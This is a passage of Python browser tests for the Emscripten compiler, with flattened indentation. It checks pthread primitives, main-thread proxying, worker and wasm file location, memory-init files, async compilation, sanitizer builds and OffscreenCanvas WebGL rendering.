@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
  @no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Stress test pthreads allocating memory that will call sbrk(), with the main thread having to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
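  # (The test source is assumed to busy-wait on a volatile global flag that is
  # flipped from another thread; the -DUSE_C_VOLATILE define selects the plain C
  # volatile variant of that flag.)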
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
    # Test that it is possible to define a "Module.locateFile" function to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
  # Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('-s SAFE_STACK is only supported on WASM backend')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'SAFE_STACK', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
  # Test that it is possible to send a signal via calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
      assert not os.path.exists('test.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
      self.run_browser('test.html', None, '/report_result?0') # the in-flight memfile request never happens when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
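  # (manual_wasm_instantiate.html is assumed to supply a
  # Module.instantiateWasm(imports, successCallback) implementation that fetches
  # and instantiates the wasm itself, calls successCallback with the resulting
  # instance, and returns the instance's exports.)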
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
    create_test_file(src, self.with_report_result(open(path_from_root('tests', 'manual_wasm_instantiate.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
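  # Compare generated JS size across the TEXTDECODER modes (assumed meanings:
  # 0 = never use TextDecoder and ship only the JS fallback decoder, the default
  # = use TextDecoder when available plus the fallback, 2 = rely on TextDecoder
  # unconditionally with no fallback, which should yield the smallest output).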
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 6050), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
    self.skipTest('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
@requires_offscreen_canvas
